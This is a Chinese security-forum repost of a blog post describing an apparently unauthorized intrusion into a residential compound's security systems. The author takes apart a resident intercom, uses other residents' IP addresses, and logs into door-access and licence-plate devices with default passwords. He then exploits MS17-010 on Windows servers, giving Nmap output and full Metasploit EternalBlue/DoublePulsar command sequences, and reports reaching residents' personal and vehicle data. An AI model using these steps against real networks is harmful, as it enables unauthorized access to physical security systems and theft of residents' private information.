安全矩阵

 找回密码
 立即注册
搜索
查看: 365|回复: 0

实战|拿下小区的安防系统

[复制链接]

417

主题

417

帖子

2391

积分

金牌会员

Rank: 6Rank: 6

积分
2391
发表于 2023-12-7 20:35:20 | 显示全部楼层 |阅读模式
天驿安全 2023-12-04 03:30 发表于甘肃

近源渗透
01

前言
这篇文章的思路在现在看来还是有一定的价值,用这个思路我觉得还能拿下自己小区的安防系统。
博主所购的小区对自己的智能化系统宣传的很到位,所以闲下来的时候博主我就对小区的安防系统进行一次简单的渗透,轻松拿下各种安防系统,这篇文章就来详细的说明一下。

02

准备
开始之前,博主需要对环境进行一个简单的描述,以便大家能够在脑海中脑补一下整个渗透测试的过程,算是博主在线下渗透的一个例子吧,往后还有对整个商场各种店铺各种的渗透过程,都会一一讲解。
好了,废话就不多说了,咱们既然是对网络系统进行渗透测试,自然是得有一个入口,那这个入口在哪找呢?

大家都知道,一般小区这种内部的网络都是不直接连接到外网的,如果连那也是做了隔离,单独有一个跳板来做转发,这样相对比较安全,但是正常情况都是没外网的,这种局域网系统有两个突出的特点。
第一点就是维护人员过分的信任了内网的机器,认为只要不连接外网就基本上没事,高枕无忧,真是图样图森破。

第二点就是没有安全防护软件,就算有,那也是病毒特征库千百年不会更新,跟摆设一样,没有外网更新个毛线,这一点后面有机器可以验证。
所以具备这两个特点的内部局域网是非常脆弱的,只要找到一个入口,基本上整个网络就game over了,这个入口就非常的好找了。

众所周知,现在的小区都是家家户户安装了一个可视对讲机,这玩意有时候挺好用,比如有客人来了,楼下大门门禁可以用这玩意远程开门,可以语音对讲,可以看到对方的脸,还可以录音录像,不仅如此,还能跟家里的烟雾报警器连起来,发生火灾直接通知物业并发出警报,还可以呼叫其他住户来一个免费的局域网语音聊天,功能可以说是相当丰富了。

你猜的没错,咱们整个渗透测试过程就从这个设备开始,先来看看咱们这个厉害的可视对讲机长什么样


通过缺省弱口令进入工程模式,拿到ip地址,网关还有服务器地址




拆下对讲机


我擦嘞,这网线也太短了吧,上工具



把网线进行延长方便接交换机、路由器、笔记本之类的设备,最后确认下通讯是否正确


基本准备工作搞定之后就开始进行入侵渗透了。

03开干

根据之前撸光猫内网的经验,这里的IP地址肯定是固定的,而且跟住户号是绑定的,如果使用自己的iP地址进行测试,万一出啥问题那不是非常的尴尬,既然现在很多业主都还没有入住,那么IP地址池也有很多的空闲,就使用其他住户的IP地址吧,只要不冲突就行,说干就干,上装备:
一个充电宝、一个路由器、一台笔记本






通电后设置路由器的固定IP


这样笔记本通过无线wifi就可以对IP段进行扫描了,我这使用的扫描软件是Angry IP Scanner,图形界面用起来很爽,而且速度也快


对192.165.0.1/16进行扫描发现存活主机1256个,为了对IP地址快速分类,将存活的IP地址全部导出,编写python脚本对ip的http响应头进行分类,



最终分为下面的这几类:



第一类
mini_httpd/1.19 19dec2003
这一类机器是所有的门禁机,包含了住户家里的对讲机,楼栋大堂的门禁机,车库电梯的门禁机,小区大门的门禁机,通过ip地址以及admin / 123456弱口令可以远程控制,同时telnet也可以连接,管理页面功能很全,包括修改密码,控制开门时间,控制门禁机密码,呼叫住户,呼叫物业中心,恢复出厂设置等等,功能丰富,界面如下





第二类
DNVRS-Webs
Hikvision-webs/
App-webs/
这三种都是海康威视的监控探头,登录界面有以下几种






只有中间那种可以无限次输错密码进行爆破,其他两种都是输错五次就锁定


第三类
Net Keybord-Webs
这是一个网络键盘,通常用于操作监控的云台转动,比如球机的操作杆,登录界面



密码输错6次就锁定。


第四类
Boa/0.94.13
这个就有意思了,这是车牌识别系统,车辆入库的时候进行车牌识别,拍照存储的机器,也是全部admin admin弱口令直接登录,里面存储了些啥就不多说了,放两张图大家随意感受下







通过对这几种设备的归类扫描,最终确定了几台windows服务器

192.165.15.174
192.165.15.177
192.165.15.190
192.165.15.200
192.165.30.2
使用Nmap扫描结果如下


  1. # Nmap 7.70 scan initiated Fri May 18 23:51:30 2018 as: nmap -iL something_ip.txt -oN scaned.txt -T4 --open
  2. Nmap scan report for 192.165.15.174
  3. Host is up (0.063s latency).
  4. Not shown: 990 closed ports
  5. PORT      STATE SERVICE
  6. 135/tcp   open  msrpc
  7. 139/tcp   open  netbios-ssn
  8. 445/tcp   open  microsoft-ds
  9. 1433/tcp  open  ms-sql-s
  10. 2383/tcp  open  ms-olap4
  11. 49152/tcp open  unknown
  12. 49153/tcp open  unknown
  13. 49154/tcp open  unknown
  14. 49155/tcp open  unknown
  15. 49156/tcp open  unknown

  16. Nmap scan report for 192.165.15.190
  17. Host is up (0.046s latency).
  18. Not shown: 992 closed ports
  19. PORT      STATE SERVICE
  20. 135/tcp   open  msrpc
  21. 139/tcp   open  netbios-ssn
  22. 445/tcp   open  microsoft-ds
  23. 49152/tcp open  unknown
  24. 49153/tcp open  unknown
  25. 49154/tcp open  unknown
  26. 49155/tcp open  unknown
  27. 49156/tcp open  unknown

  28. Nmap scan report for 192.165.15.200
  29. Host is up (0.030s latency).
  30. Not shown: 991 closed ports
  31. PORT      STATE SERVICE
  32. 135/tcp   open  msrpc
  33. 139/tcp   open  netbios-ssn
  34. 445/tcp   open  microsoft-ds
  35. 49152/tcp open  unknown
  36. 49153/tcp open  unknown
  37. 49154/tcp open  unknown
  38. 49155/tcp open  unknown
  39. 49156/tcp open  unknown
  40. 49157/tcp open  unknown

  41. Nmap scan report for 192.165.30.2
  42. Host is up (0.064s latency).
  43. Not shown: 990 closed ports
  44. PORT      STATE SERVICE
  45. 135/tcp   open  msrpc
  46. 139/tcp   open  netbios-ssn
  47. 445/tcp   open  microsoft-ds
  48. 3389/tcp  open  ms-wbt-server
  49. 49152/tcp open  unknown
  50. 49153/tcp open  unknown
  51. 49154/tcp open  unknown
  52. 49155/tcp open  unknown
  53. 49156/tcp open  unknown
  54. 49157/tcp open  unknown

  55. # Nmap done at Fri May 18 23:51:46 2018 -- 5 IP addresses (4 hosts up) scanned in 16.25 seconds
复制代码


很明显,四台机器都开了445端口,其中 192.165.15.174 开了1433端口,明显是sql server数据库,192.165.30.2还开了3389,这台机器是在门禁机里面见过,是门禁系统的服务器。

下面就重点对这几台机器入手,使用msf扫描下看是不是都存在smb漏洞(ms17_010),这漏洞在局域网真的超级好用,扫描截图



发现只有192.165.15.174 不存在ms17_010,其他三台都存在,操作系统分别是

192.165.15.190 win7 sp1 x86
192.165.15.200 win7 sp1 x64
192.165.30.2 win7 sp1 x86
现在目标就非常明确了,但是有个问题,msf自带的利用模块只针对x64版本的操作系统,对于x86版本的系统只能使用其他工具,emmmmm....

一阵思考之后,博主决定先搞定那台64位win7,为了能够正常的反弹shell回来,我把路由器改成桥接模式,本机电脑设置固定IP,这样我的机器就跟目标机器处于相同网络拓扑,反弹自然无压力



so...

msf的用法我这里就不多说了,如果真不知道,可以留言...给出一张run vnc的截图,拿下监控系统







有趣的是这台机器上居然安装了360安全卫士...

注意看上面一张图的那个监控室,管理员面前有三台机器,所以另外两台我下一步就要搞定。

上面说64位win7已经拿下,现在搞定32位机器,使用 https://github.com/ElevenPaths/E ... lepulsar-Metasploit 这里的Ruby脚本即可,需要注意的是如果本机是kali 64位的需要安装 wine32,安装方法是

  1. dpkg --add-architecture i386 && apt-get update && apt-get install wine32
  2. 而且全程操作需要在root下面,安装完wine32后执行一下 wine32 cmd.exe 这样会自动在/root下面创建.wine目录,这个目录msf会用到

  3. 使用
  4. git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git
复制代码

  1. 将脚本克隆到本地,然后把目录下的deps 目录和rb文件复制到msf的modules路径下,这样既可以使用了(PS:我这里只复制了rb脚本,deps没有复制过去所以命令不太一样),具体命令如下

  2. msf > use  exploit/windows/smb/eternalblue_doublepulsar
  3. msf exploit(windows/smb/eternalblue_doublepulsar) > set ETERNALBLUEPATH /home/poweroff/Github/Eternalblue-Doublepulsar-Metasploit/deps/
  4. ETERNALBLUEPATH => /home/poweroff/Github/Eternalblue-Doublepulsar-Metasploit/deps/
  5. msf exploit(windows/smb/eternalblue_doublepulsar) > set DOUBLEPULSARPATH /home/poweroff/Github/Eternalblue-Doublepulsar-Metasploit/deps/
  6. DOUBLEPULSARPATH => /home/poweroff/Github/Eternalblue-Doublepulsar-Metasploit/deps/
  7. msf exploit(windows/smb/eternalblue_doublepulsar) > set TARGETARCHITECTURE x86
  8. TARGETARCHITECTURE => x86
  9. msf exploit(windows/smb/eternalblue_doublepulsar) > set PROCESSINJECT  wlms.exe
  10. PROCESSINJECT => wlms.exe
  11. msf exploit(windows/smb/eternalblue_doublepulsar) > show targets

  12. Exploit targets:

  13.    Id  Name
  14.    --  ----
  15.    0   Windows XP (all services pack) (x86) (x64)
  16.    1   Windows Server 2003 SP0 (x86)
  17.    2   Windows Server 2003 SP1/SP2 (x86)
  18.    3   Windows Server 2003 (x64)
  19.    4   Windows Vista (x86)
  20.    5   Windows Vista (x64)
  21.    6   Windows Server 2008 (x86)
  22.    7   Windows Server 2008 R2 (x86) (x64)
  23.    8   Windows 7 (all services pack) (x86) (x64)


  24. msf exploit(windows/smb/eternalblue_doublepulsar) > set target 8
  25. target => 8
  26. msf exploit(windows/smb/eternalblue_doublepulsar) > set rhost
  27. set rhost  
  28. msf exploit(windows/smb/eternalblue_doublepulsar) > set rhost 192.165.15.190
  29. rhost => 192.165.15.190
  30. msf exploit(windows/smb/eternalblue_doublepulsar) > set lhost 192.165.7.11
  31. lhost => 192.165.7.11
  32. msf exploit(windows/smb/eternalblue_doublepulsar) > exploit
复制代码


不出意外的话攻击就成功了,给出攻击成功的截图。

第一个是门禁系统,没装杀毒软件,就只有一些门禁卡管理软件



第二个系统是车辆管理系统,车辆出入库时候用的


04总结

至此,小区的安防系统已成功拿下,其中在服务器中还发现了大量的敏感文件,包括业主的个人信息,车辆信息,车辆出入登记信息等等,难怪说各种骚扰电话,这简直要分分钟泄露。

05参考链接

文章来源:92ez

原文链接:https://www.cnblogs.com/nul1/p/11619605.html

排版:李白你好


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-4-13 10:36 , Processed in 0.016274 second(s), 19 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表